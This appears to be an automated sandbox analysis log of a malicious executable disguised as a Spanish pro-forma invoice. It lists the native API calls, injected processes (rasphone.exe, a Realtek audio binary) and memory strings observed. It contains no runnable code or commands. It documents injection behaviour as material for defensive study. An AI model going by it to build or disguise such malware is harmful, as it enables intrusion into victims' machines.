Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882E80 NtCreateProcessEx,		4_2_04882E80
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882EB0 NtProtectVirtualMemory,		4_2_04882EB0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882EC0 NtQuerySection,		4_2_04882EC0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882ED0 NtResumeThread,		4_2_04882ED0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882E00 NtQueueApcThread,		4_2_04882E00
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882FB0 NtSetValueKey,		4_2_04882FB0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882F30 NtOpenDirectoryObject,		4_2_04882F30
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048829D0 NtWaitForSingleObject,		4_2_048829D0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882AA0 NtQueryInformationFile,		4_2_04882AA0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882BE0 NtQueryVirtualMemory,		4_2_04882BE0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04882B20 NtQueryInformationProcess,		4_2_04882B20
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04883C90 NtOpenThread,		4_2_04883C90
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04883C30 NtOpenProcessToken,		4_2_04883C30
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048838D0 NtGetContextThread,		4_2_048838D0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_028E97D1 NtClose,		4_2_028E97D1
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_028E976B NtDeleteFile,		4_2_028E976B
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C1F01D NtQueryInformationProcess,NtReadVirtualMemory,		4_2_04C1F01D
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C23628 NtSetContextThread,		4_2_04C23628
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C1F026 NtQueryInformationProcess,		4_2_04C1F026
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C23C68 NtResumeThread,		4_2_04C23C68
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C23F88 NtQueueApcThread,		4_2_04C23F88
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C23948 NtSuspendThread,		4_2_04C23948

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

0_2_0040351C

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 0_2_00406C5F		0_2_00406C5F
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 0_2_707E1BFF		0_2_707E1BFF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36764670		2_2_36764670
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367ED646		2_2_367ED646
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DD62C		2_2_367DD62C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675C600		2_2_3675C600
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FF6F6		2_2_367FF6F6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673C6E0		2_2_3673C6E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B36EC		2_2_367B36EC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FA6C0		2_2_367FA6C0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740680		2_2_36740680
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36742760		2_2_36742760
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674A760		2_2_3674A760
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F6757		2_2_367F6757
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740445		2_2_36740445
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367AD480		2_2_367AD480
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3680A526		2_2_3680A526
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FF5C9		2_2_367FF5C9
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F75C6		2_2_367F75C6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F124C		2_2_367F124C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36702245		2_2_36702245
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672D2EC		2_2_3672D2EC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FF330		2_2_367FF330
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674E310		2_2_3674E310
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36731380		2_2_36731380
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EE076		2_2_367EE076
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F70F1		2_2_367F70F1
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674B0D0		2_2_3674B0D0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367300A0		2_2_367300A0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3677508C		2_2_3677508C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3678717A		2_2_3678717A
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DD130		2_2_367DD130
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3672F113		2_2_3672F113
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3680010E		2_2_3680010E
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675B1E0		2_2_3675B1E0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367451C0		2_2_367451C0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367E0E6D		2_2_367E0E6D
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36760E50		2_2_36760E50
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36782E48		2_2_36782E48
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36732EE8		2_2_36732EE8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F9ED2		2_2_367F9ED2
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36741EB2		2_2_36741EB2
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F0EAD		2_2_367F0EAD
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FFF63		2_2_367FFF63
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674CF00		2_2_3674CF00
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36746FE0		2_2_36746FE0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F1FC6		2_2_367F1FC6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FEFBF		2_2_367FEFBF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36743C60		2_2_36743C60
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F6C69		2_2_367F6C69
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FEC60		2_2_367FEC60
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367EEC4C		2_2_367EEC4C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3674AC20		2_2_3674AC20
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36730C12		2_2_36730C12
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3680ACEB		2_2_3680ACEB
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675FCE0		2_2_3675FCE0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36758CDF		2_2_36758CDF
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367D9C98		2_2_367D9C98
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740D69		2_2_36740D69
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F7D4C		2_2_367F7D4C
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FFD27		2_2_367FFD27
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673AD00		2_2_3673AD00
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367DFDF4		2_2_367DFDF4
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36749DD0		2_2_36749DD0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36752DB0		2_2_36752DB0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FEA5B		2_2_367FEA5B
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FCA13		2_2_367FCA13
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675FAA0		2_2_3675FAA0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FFA89		2_2_367FFA89
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FFB2E		2_2_367FFB2E
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36740B10		2_2_36740B10
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3677DB19		2_2_3677DB19
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B4BC0		2_2_367B4BC0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36749870		2_2_36749870
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3675B870		2_2_3675B870
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B5870		2_2_367B5870
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FF872		2_2_367FF872
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36726868		2_2_36726868
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367E0835		2_2_367E0835
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3676E810		2_2_3676E810
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36743800		2_2_36743800
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F78F3		2_2_367F78F3
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367F18DA		2_2_367F18DA
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367428C0		2_2_367428C0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367B98B2		2_2_367B98B2
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36756882		2_2_36756882
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367099E8		2_2_367099E8
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367859C0		2_2_367859C0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3673E9A0		2_2_3673E9A0
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_367FE9A6		2_2_367FE9A6
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3643E7FC		2_2_3643E7FC
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3643E463		2_2_3643E463
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_36445404		2_2_36445404
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3643E345		2_2_3643E345
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: 2_2_3643D8C8		2_2_3643D8C8
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006EA463		3_2_006EA463
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006F1404		3_2_006F1404
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006E98C8		3_2_006E98C8
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006EA345		3_2_006EA345
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_006EA7FC		3_2_006EA7FC
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_049211E5		3_2_049211E5
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_04927DED		3_2_04927DED
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_04920D2E		3_2_04920D2E
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_049202B1		3_2_049202B1
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_04920E4C		3_2_04920E4C
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04850445		4_2_04850445
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0491A526		4_2_0491A526
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04850680		4_2_04850680
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490A6C0		4_2_0490A6C0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0484C6E0		4_2_0484C6E0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0486C600		4_2_0486C600
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04874670		4_2_04874670
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04906757		4_2_04906757
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04852760		4_2_04852760
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0485A760		4_2_0485A760
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048400A0		4_2_048400A0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048FE076		4_2_048FE076
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0491010E		4_2_0491010E
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0485E310		4_2_0485E310
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04868CDF		4_2_04868CDF
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0491ACEB		4_2_0491ACEB
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04840C12		4_2_04840C12
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0485AC20		4_2_0485AC20
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048CEC20		4_2_048CEC20
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048FEC4C		4_2_048FEC4C
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490EC60		4_2_0490EC60
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04906C69		4_2_04906C69
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04862DB0		4_2_04862DB0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0484AD00		4_2_0484AD00
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04850D69		4_2_04850D69
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04900EAD		4_2_04900EAD
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04842EE8		4_2_04842EE8
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04892E48		4_2_04892E48
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04870E50		4_2_04870E50
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048F0E6D		4_2_048F0E6D
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490EFBF		4_2_0490EFBF
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04856FE0		4_2_04856FE0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0485CF00		4_2_0485CF00
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04866882		4_2_04866882
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048EC89F		4_2_048EC89F
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048528C0		4_2_048528C0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0487E810		4_2_0487E810
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048F0835		4_2_048F0835
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04836868		4_2_04836868
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0484E9A0		4_2_0484E9A0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490E9A6		4_2_0490E9A6
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048F2AC0		4_2_048F2AC0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490CA13		4_2_0490CA13
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490EA5B		4_2_0490EA5B
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048C4BC0		4_2_048C4BC0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04850B10		4_2_04850B10
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048BD480		4_2_048BD480
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048E5490		4_2_048E5490
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_049075C6		4_2_049075C6
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490F5C9		4_2_0490F5C9
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048C36EC		4_2_048C36EC
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490F6F6		4_2_0490F6F6
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048ED62C		4_2_048ED62C
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048F1623		4_2_048F1623
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048FD646		4_2_048FD646
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0488508C		4_2_0488508C
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0485B0D0		4_2_0485B0D0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_049070F1		4_2_049070F1
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048551C0		4_2_048551C0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0486B1E0		4_2_0486B1E0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0483F113		4_2_0483F113
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048ED130		4_2_048ED130
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0489717A		4_2_0489717A
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0483D2EC		4_2_0483D2EC
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490124C		4_2_0490124C
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04841380		4_2_04841380
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490F330		4_2_0490F330
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048E9C98		4_2_048E9C98
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048D7CE8		4_2_048D7CE8
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0486FCE0		4_2_0486FCE0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04853C60		4_2_04853C60
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04859DD0		4_2_04859DD0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048EFDF4		4_2_048EFDF4
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490FD27		4_2_0490FD27
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04907D4C		4_2_04907D4C
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04851EB2		4_2_04851EB2
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04909ED2		4_2_04909ED2
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048F3FA0		4_2_048F3FA0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04901FC6		4_2_04901FC6
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048CFF40		4_2_048CFF40
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490FF63		4_2_0490FF63
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048C98B2		4_2_048C98B2
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_049018DA		4_2_049018DA
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_049078F3		4_2_049078F3
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04853800		4_2_04853800
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490F872		4_2_0490F872
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04859870		4_2_04859870
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0486B870		4_2_0486B870
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048C5870		4_2_048C5870
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048959C0		4_2_048959C0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490FA89		4_2_0490FA89
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0486FAA0		4_2_0486FAA0
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_048E1B80		4_2_048E1B80
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0488DB19		4_2_0488DB19
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_0490FB2E		4_2_0490FB2E
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C1F01D		4_2_04C1F01D
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C1E463		4_2_04C1E463
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C1E7FC		4_2_04C1E7FC
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C1E345		4_2_04C1E345
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: 4_2_04C1D8C8		4_2_04C1D8C8

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: String function: 367BEF10 appears 104 times
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: String function: 36775050 appears 36 times
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: String function: 3672B910 appears 268 times
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: String function: 36787BE4 appears 90 times
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Code function: String function: 367AE692 appears 86 times
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: String function: 048BE692 appears 86 times
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: String function: 04885050 appears 58 times
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: String function: 048CEF10 appears 105 times
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: String function: 0483B910 appears 278 times
Source: C:\Windows\SysWOW64\rasphone.exe	Code function: String function: 04897BE4 appears 102 times

Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000000.00000000.83096652287.0000000000453000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamebrigitts.exe4 vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84317744009.000000003667F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000002.84426043945.00000000369D0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
Source: FACTURA PROFORMA MATRICULACI#U00d3N.exe, 00000002.00000003.84314222092.00000000364CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs FACTURA PROFORMA MATRICULACI#U00d3N.exe
